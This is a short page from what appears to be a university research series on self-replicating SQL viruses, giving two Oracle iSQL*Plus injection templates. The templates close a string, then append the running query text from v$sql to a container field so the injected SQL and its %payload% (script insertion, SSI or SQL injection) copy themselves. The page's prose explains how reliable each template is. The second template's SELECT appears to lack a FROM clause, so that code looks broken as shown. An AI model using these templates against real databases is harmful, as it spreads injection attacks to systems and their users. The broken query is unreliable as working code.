logo
Go to the homepage of the Vrije Universiteit. Go to the homepage of the faculty of sciences.

SQL Virus Using Self-Referential Queries for Oracle (iSQL*Plus)


On Oracle, the following code will perform the attack, when using iSQL*Plus:
%content%';linebreak
UPDATE NewContainerContents SET ContainerContents=ContainerContents || ';' || CHR(10) || (SELECT SQL_TEXT FROM v$sql WHERE INSTR(SQL_TEXT,'%payload%')>0);
Exploit  1 - Oracle (iSQL*Plus) exploit using multiple queries
Note that the first linebreak is the only significant one, the others are introduced for readability.
In the above example, the payload can be a script insertion or SSI attack. It is used both as an attack and to select the proper query from the v$sql view. This will cause the attack to fail if multiple instances run at the same time, as the SELECT query returns multiple values.

Exploit  2 shows a more reliable Oracle exploit, but this one is considerably larger.

%content%';linebreak
UPDATE NewContainerContents SET ContainerContents=ContainerContents || ';' || CHR(10) || (SELECT SQL_TEXT v$sql sql, v$session ses, v$mystat sta WHERE sql.sql_id=ses.sql_id AND ses.sid=sta.sid AND sta.STATISTIC#=0) || ';' || CHR(10) || '%payload%'; linebreak
%payload%
Exploit  2 - Reliable Oracle (iSQL*Plus) exploit using multiple queries
In this case, the payload must be included twice, once to copy it and once to execute it. This example allows SQL injection attacks.

Previous SQL Virus Using Self-Referential Queries for Oracle (OCI)
Up SQL Virus Using Self-Referential Queries
SQL Virus Using Self-Referential Queries for PostgreSQL Next

Last modified: Thursday, 02 March 2006 18:10, CET
If you spot a mistake, please e-mail the maintainer of this page.
Your browser does not fully support CSS. This may result in visual artifacts.